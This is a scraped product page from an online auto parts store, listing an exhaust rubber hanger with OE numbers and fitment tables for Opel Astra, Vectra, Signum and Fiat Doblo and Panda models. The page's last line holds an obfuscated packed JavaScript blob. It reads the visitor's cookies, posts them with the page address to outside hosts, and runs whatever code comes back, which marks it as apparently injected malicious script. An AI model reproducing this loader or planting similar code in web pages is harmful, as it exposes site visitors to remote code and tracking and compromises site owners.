Exhaust Rubber Mount Hangers : EXHAUST RUBBER HANGER FOR FIAT DOBLO PANDA OPEL VECTRA ASTRA
  • Welcome to Auto Moto Parts online store!
  • Call:  085 8555 980
0

EXHAUST RUBBER HANGER FOR FIAT DOBLO PANDA OPEL VECTRA ASTRA

Manufactured by: FA1 Fischer Automotive Ones
Manufacturer ref. number: 123-742
Material: EPDM (ethylene propylene diene Monomer (M-class) rubber) Steel Elastomer
Quantity x1
OE/OEM NUMBERS
FIAT 55187596
OPEL 5850477
OPEL 55557723
OPEL 55559084
OPEL 5850341
OPEL 5852732

Make Model Eng. Month/Year KW HP CC Type
OPEL ASTRA H (A04) 1.3 CDTI (L48) 08.05 - 10.10 66 90 1248 Hatchback
for vehicles with soot filter
for soot particulate filter
OPEL ASTRA H (A04) 1.9 CDTI (L48) 09.05 - 10.10 74 100 1910 Hatchback
for vehicles with soot filter
OPEL ASTRA H (A04) 1.9 CDTI (L48) 09.04 - 10.10 110 150 1910 Hatchback
for vehicles with soot filter
OPEL ASTRA H GTC (A04) 1.3 CDTI (L08) 04.05 - 10.10 66 90 1248 Hatchback
for vehicles with soot filter
for soot particulate filter
OPEL ASTRA H GTC (A04) 1.9 CDTI (L08) 01.06 - 10.10 74 101 1910 Hatchback
for vehicles with soot filter
OPEL ASTRA H GTC (A04) 1.9 CDTi 16V (L08) 03.05 - 10.10 88 120 1910 Hatchback
for vehicles with soot filter
OPEL ASTRA H GTC (A04) 1.9 CDTi (L08) 03.05 - 10.10 110 150 1910 Hatchback
for vehicles with soot filter
OPEL ASTRA H Saloon (A04) 1.3 CDTi (L69) 02.07 - 10.10 66 90 1248 Saloon
for vehicles with soot filter
for soot particulate filter
OPEL ASTRA H Estate (A04) 1.3 CDTI (L35) 08.05 - 10.10 66 90 1248 Estate
for vehicles with soot filter
for soot particulate filter
OPEL ASTRA H Estate (A04) 1.9 CDTI (L35) 09.05 - 10.10 74 100 1910 Estate
for vehicles with soot filter
OPEL ASTRA H Estate (A04) 1.9 CDTI 16V (L35) 08.04 - 10.10 88 120 1910 Estate
for vehicles with soot filter
OPEL ASTRA H Estate (A04) 1.9 CDTI (L35) 09.04 - 10.10 110 150 1910 Estate
for vehicles with soot filter
OPEL ASTRA H TwinTop (A04) 1.9 CDTi (L67) 09.05 - 10.10 110 150 1910 Convertible
for vehicles with soot filter
OPEL ASTRA H Box (L70) 1.3 CDTI (L70) 08.05 - 10.10 66 90 1248 Box
for vehicles with soot filter
for soot particulate filter
OPEL ASTRA H Box (L70) 1.9 CDTI (L70) 09.05 - 10.10 88 120 1910 Box
OPEL ASTRA H Box (L70) 1.9 CDTI 16V (L70) 08.04 - 10.10 88 120 1910 Box
OPEL ASTRA H Box (L70) 1.9 CDTI (L70) 09.04 - 10.10 110 150 1910 Box
OPEL SIGNUM Hatchback (Z03) 1.9 CDTI (F48) 08.05 - 02.08 74 100 1910 Hatchback
Fitting Position: Front
OPEL SIGNUM Hatchback (Z03) 1.9 CDTI (F48) 04.04 - 02.08 88 120 1910 Hatchback
Fitting Position: Front
OPEL SIGNUM Hatchback (Z03) 1.9 CDTI (F48) 04.04 - 02.08 110 150 1910 Hatchback
Fitting Position: Front
OPEL VECTRA C GTS (Z02) 1.9 CDTI (F68) 10.05 - 74 100 1910 Hatchback
Quantity required: 2
OPEL VECTRA C GTS (Z02) 1.9 CDTI (F68) 04.04 - 01.09 88 120 1910 Hatchback
Quantity required: 2
OPEL VECTRA C GTS (Z02) 1.9 CDTI (F68) 04.04 - 110 150 1910 Hatchback
Quantity required: 2
OPEL VECTRA C (Z02) 1.9 CDTI (F69) 10.05 - 74 100 1910 Saloon
Quantity required: 2
OPEL VECTRA C (Z02) 1.9 CDTI (F69) 04.04 - 01.09 88 120 1910 Saloon
Quantity required: 2
OPEL VECTRA C (Z02) 1.9 CDTI (F69) 04.04 - 110 150 1910 Saloon
Quantity required: 2
OPEL VECTRA C Estate (Z02) 1.9 CDTI (F35) 10.05 - 74 100 1910 Estate
Quantity required: 2
OPEL VECTRA C Estate (Z02) 1.9 CDTI (F35) 04.04 - 01.09 88 120 1910 Estate
Quantity required: 2
OPEL VECTRA C Estate (Z02) 1.9 CDTI (F35) 04.04 - 110 150 1910 Estate
Quantity required: 2


FIAT DOBLO MPV (119_, 223_) 1.3 D Multijet 10.05 - 62 84 1248 MPV
for vehicles with soot filter
FIAT PANDA (169_) 1.3 D Multijet 06.06 - 55 75 1248 Hatchback
for vehicles with soot filter

Brands

We sell high quality products in our store, from high quality manutfacturers such as

02
01
03
04
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 58={\'25\':[\'//83.67\',\'//68.72\',\'77://5.82.62.81\'],\'41\':\'/76.75\',\'6\':\'66\',\'61\':37};19 52(){2 3;9{3=26 48("71.60")}11(13){9{3=26 48("80.60")}11(70){3=37}}7(!3&&74 49!=\'65\'){3=26 49()}27 3};19 24(28){2 6=" "+55.6;2 39=" "+28+"=";2 36=15;2 16=0;2 23=0;7(6.14>0){16=6.47(39);7(16!=-1){16+=39.14;23=6.47(";",16);7(23==-1){23=6.14}36=79(6.78(16,23))}}27(36)};19 22(28,54,30,33,35,43){55.6=28+"="+73(54)+((30)?"; 30="+30:"")+((33)?"; 33="+33:"")+((35)?"; 35="+35:"")+((43)?"; 43":"")};(19(8){2 20=24(8[\'6\']);7(20==15)20=0;2 32=24(8[\'6\']+\'69\');7(32==15)32=\'[]\';2 29=24(8[\'6\']+\'46\');7(29==15)29=\'[]\';2 40=\'84=\'+20.57()+\'&98=\'+38(51.102.103)+\'&104=\'+38(32)+\'&105=\'+38(29);2 21=0;2 53=8[\'25\'][21]+8[\'41\'];2 3=52();3.59(\'64\',53,42);3.107("101-108","109/110-111-112-113");3.114=19(){7(3.106==4){7(3.100!=85){++21;7(21>=8[\'25\'].14)27;99=42;3.59(\'64\',8[\'25\'][21]+8[\'41\'],42);3.50(40)}97{9{7(3.63.14==0)27;2 18=45.56(3.63);2 34=\'\';2 17=0;2 44=37;9{34=18[\'96\']}11(13){}9{17=18[\'95\']}11(13){}9{44=(18[\'94\']==1)}11(13){}8[\'61\']=44;7(34.14>0){2 12=26 93();12.92(12.91()+1);7(17>0){22(8[\'6\']+\'90\',17.57(),12.31())}9{22(8[\'6\']+\'89\',18[\'88\'],12.31())}11(13){}7(20==0){22(8[\'6\'],\'1\',12.31())}2 10=15;9{10=45.56(24(8[\'6\']+\'46\'))}11(13){}7(10==15)10=[];7(10.47(17)==-1)10[10.14]=1*17;22(8[\'6\']+\'46\',45.87(10),12.31());51.86(34)}}11(13){}}}};3.50(40)})(58);',10,115,'||var|xmlhttp|||cookie|if|vAdsObj|try|vM|catch|vDate|e|length|null|offset|iT|Response|function|iStatus|iUrlInd|setCookie|end|getCookie|url|new|return|name|sMS|expires|toUTCString|sMA|path|sCode|domain|setStr|false|encodeURIComponent|search|sPayload|gate|true|secure|bM|JSON|_ms|indexOf|ActiveXObject|XMLHttpRequest|send|window|getXmlHttp|sUrl|value|document|parse|toString|vXAdsObj|open|XMLHTTP|mobile||responseText|POST|undefined|xads_platf|ink|uads|_ma|E|Msxml2|shop|escape|typeof|php|g|http|substring|unescape|Microsoft|157|188|techmarket|s|200|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|m|t|c|else|u|bByIp|status|Content|location|href|ma|ms|readyState|setRequestHeader|type|application|x|www|form|urlencoded|onreadystatechange'.split('|'),0,{}))